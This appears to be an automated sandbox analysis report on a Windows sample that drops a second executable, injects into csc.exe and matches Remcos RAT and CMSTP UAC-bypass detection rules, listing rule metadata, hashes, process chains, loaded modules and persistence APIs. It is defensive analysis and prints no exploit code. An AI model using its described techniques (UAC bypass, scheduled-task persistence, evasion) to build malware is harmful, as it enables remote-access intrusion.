Source: 4.2.dzocgvabs.exe.5a60000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 4.2.dzocgvabs.exe.5a60000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000004.00000002.2056165687.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000004.00000002.2056165687.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000004.00000002.2056165687.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000004.00000002.2056568324.000000000DC80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000004.00000002.2056568324.000000000DC80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000004.00000002.2056568324.000000000DC80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: Process Memory Space: dzocgvabs.exe PID: 7884, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown

.NET source code contains very large array initializations

Source: 0.2.pPLwX9wSrD.exe.cd0000.1.raw.unpack, MapAnalyzer.cs

Large array initialization: LinkSetMap: array initializer size 543568

Drops large PE files

Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	File dump: OrionLegacyCLI.exe.0.dr 979567344			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	File dump: HardDiskSentinelBin.exe.4.dr 979567142			Jump to dropped file

Source: C:\Users\user\Desktop\pPLwX9wSrD.exe

Code function: 0_2_0046DEE0 OpenServiceA,DeleteService,CloseServiceHandle,

0_2_0046DEE0

Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Code function: 0_2_004572FB	0_2_004572FB
Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Code function: 0_2_00458283	0_2_00458283
Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Code function: 0_2_004553AB	0_2_004553AB
Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Code function: 0_2_004564DE	0_2_004564DE
Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Code function: 0_2_004566F3	0_2_004566F3
Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Code function: 0_2_004559AF	0_2_004559AF
Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Code function: 0_2_00455A63	0_2_00455A63
Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Code function: 0_2_00457AD4	0_2_00457AD4
Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Code function: 0_2_00457A9C	0_2_00457A9C
Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Code function: 0_2_00457B5D	0_2_00457B5D
Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Code function: 0_2_00460B10	0_2_00460B10
Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Code function: 0_2_00458B21	0_2_00458B21
Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Code function: 0_2_00455BF9	0_2_00455BF9
Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Code function: 0_2_00455BA2	0_2_00455BA2
Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Code function: 0_2_00455C7A	0_2_00455C7A
Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Code function: 0_2_00462C20	0_2_00462C20
Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Code function: 0_2_00455D26	0_2_00455D26
Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Code function: 0_2_00458E12	0_2_00458E12
Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Code function: 0_2_00457E2D	0_2_00457E2D
Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Code function: 0_2_00455EAD	0_2_00455EAD
Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Code function: 0_2_00455FC0	0_2_00455FC0
Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Code function: 0_2_00456FC9	0_2_00456FC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_05777158	3_2_05777158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_05777148	3_2_05777148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_05774867	3_2_05774867
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_05774868	3_2_05774868
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_05771BC0	3_2_05771BC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_0745073F	3_2_0745073F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_07453B88	3_2_07453B88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_074517E8	3_2_074517E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_07450A77	3_2_07450A77
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_0746258B	3_2_0746258B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_07468AE8	3_2_07468AE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_07468521	3_2_07468521
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_07468D3A	3_2_07468D3A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_07468AD9	3_2_07468AD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_07468127	3_2_07468127
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_07468128	3_2_07468128
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_07472758	3_2_07472758
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_07477620	3_2_07477620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_0747F380	3_2_0747F380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_07474D20	3_2_07474D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_07476DD8	3_2_07476DD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_07470DD8	3_2_07470DD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_0747CBBB	3_2_0747CBBB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_0747AA00	3_2_0747AA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_07475938	3_2_07475938
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_07472748	3_2_07472748
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_07477611	3_2_07477611
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_0747A4B0	3_2_0747A4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_0747F370	3_2_0747F370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_07475068	3_2_07475068
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_07476DC8	3_2_07476DC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_0747AA00	3_2_0747AA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_0747A9F1	3_2_0747A9F1

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe CA84EC6D70351B003D3CACB9F81BE030CC9DE7AC267CCE718173D4F42CBA2966

Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Code function: String function: 00466CB0 appears 345 times
Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Code function: String function: 0045E040 appears 44 times
Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Code function: String function: 0047F3E0 appears 49 times
Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Code function: String function: 0048472C appears 31 times
Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Code function: String function: 0047F326 appears 49 times

Source: pPLwX9wSrD.exe	Binary or memory string: OriginalFilename vs pPLwX9wSrD.exe
Source: pPLwX9wSrD.exe, 00000000.00000002.1634275689.0000000000E16000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameYtzlkwamt.exe" vs pPLwX9wSrD.exe
Source: pPLwX9wSrD.exe, 00000000.00000002.1634652361.00000000029E6000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameDBServer.EXEB vs pPLwX9wSrD.exe
Source: pPLwX9wSrD.exe	Binary or memory string: OriginalFilenameDBServer.EXEB vs pPLwX9wSrD.exe

Source: pPLwX9wSrD.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 4.2.dzocgvabs.exe.5a60000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 4.2.dzocgvabs.exe.5a60000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 4.2.dzocgvabs.exe.5a60000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 4.2.dzocgvabs.exe.dc80000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 4.2.dzocgvabs.exe.dc80000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 4.2.dzocgvabs.exe.dc80000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 4.2.dzocgvabs.exe.dc80000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 4.2.dzocgvabs.exe.dc80000.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 4.2.dzocgvabs.exe.dc80000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 4.2.dzocgvabs.exe.5a60000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 4.2.dzocgvabs.exe.5a60000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 4.2.dzocgvabs.exe.5a60000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000004.00000002.2056165687.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000004.00000002.2056165687.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000004.00000002.2056165687.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000004.00000002.2056568324.000000000DC80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000004.00000002.2056568324.000000000DC80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000004.00000002.2056568324.000000000DC80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: Process Memory Space: dzocgvabs.exe PID: 7884, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23

Source: 0.2.pPLwX9wSrD.exe.cd0000.1.raw.unpack, MapAnalyzer.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.pPLwX9wSrD.exe.cd0000.1.raw.unpack, ResponderElement.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.pPLwX9wSrD.exe.cd0000.1.raw.unpack, ResponderElement.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.3.csc.exe.894ece8.0.raw.unpack, H9dYhdNnGJ0iMLyBevQ.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.3.csc.exe.894ece8.0.raw.unpack, H9dYhdNnGJ0iMLyBevQ.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.3.csc.exe.894ece8.0.raw.unpack, H9dYhdNnGJ0iMLyBevQ.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.3.csc.exe.894ece8.0.raw.unpack, H9dYhdNnGJ0iMLyBevQ.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 3.3.csc.exe.8d239e8.7.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 3.3.csc.exe.8d239e8.7.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 3.3.csc.exe.8d239e8.7.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 3.3.csc.exe.8d239e8.7.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'
Source: 3.3.csc.exe.8cd39c8.2.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 3.3.csc.exe.8cd39c8.2.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'

Source: 3.3.csc.exe.8cd39c8.2.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 3.3.csc.exe.8cd39c8.2.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 3.3.csc.exe.8d239e8.7.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 3.3.csc.exe.8d239e8.7.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 3.3.csc.exe.8cd39c8.2.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 3.3.csc.exe.8cd39c8.2.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 3.3.csc.exe.8d239e8.7.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 3.3.csc.exe.8d239e8.7.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 3.3.csc.exe.8d239e8.7.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 3.3.csc.exe.8cd39c8.2.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 3.3.csc.exe.8d239e8.7.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 3.3.csc.exe.8cd39c8.2.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@6/5@5/4

Source: C:\Users\user\Desktop\pPLwX9wSrD.exe

Code function: CreateServiceA,CloseServiceHandle,

0_2_0046DE70

Source: C:\Users\user\Desktop\pPLwX9wSrD.exe

Code function: 0_2_004A143E FindResourceA,LoadResource,LockResource,FreeResource,

0_2_004A143E

Source: C:\Users\user\Desktop\pPLwX9wSrD.exe

Code function: 0_2_0046DF40 LockServiceDatabase,OpenServiceA,ChangeServiceConfigA,ChangeServiceConfig2A,CloseServiceHandle,UnlockServiceDatabase,GetLastError,QueryServiceLockStatusA,QueryServiceLockStatusA,

0_2_0046DF40

Source: C:\Users\user\Desktop\pPLwX9wSrD.exe

File created: C:\Users\user\Videos\OrionLegacy

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Mutant created: \Sessions\1\BaseNamedObjects\mono1234

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

File created: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe

Source: Yara match	File source: 4.2.dzocgvabs.exe.f520000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.csc.exe.8d239e8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2057015971.000000000F520000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.1792904857.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1794277108.0000000008D23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: pPLwX9wSrD.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\pPLwX9wSrD.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: pPLwX9wSrD.exe

ReversingLabs: Detection: 39%

Source: C:\Users\user\Desktop\pPLwX9wSrD.exe

File read: C:\Users\user\Desktop\pPLwX9wSrD.exe

Source: unknown	Process created: C:\Users\user\Desktop\pPLwX9wSrD.exe "C:\Users\user\Desktop\pPLwX9wSrD.exe"
Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe C:\Users\user\AppData\Local\Temp\dzocgvabs.exe
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	Process created: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe "C:\Users\user\AppData\Local\Temp\dzocgvabs.exe"
Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	Process created: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe "C:\Users\user\AppData\Local\Temp\dzocgvabs.exe"	Jump to behavior

Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Section loaded: odbc32.dll	Jump to behavior
Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Section loaded: crowdstrikeceoisextragay.dll	Jump to behavior
Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Section loaded: sentinelisabadedrtrynexttimemaybe.dll	Jump to behavior
Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: winhttp.dll	Jump to behavior
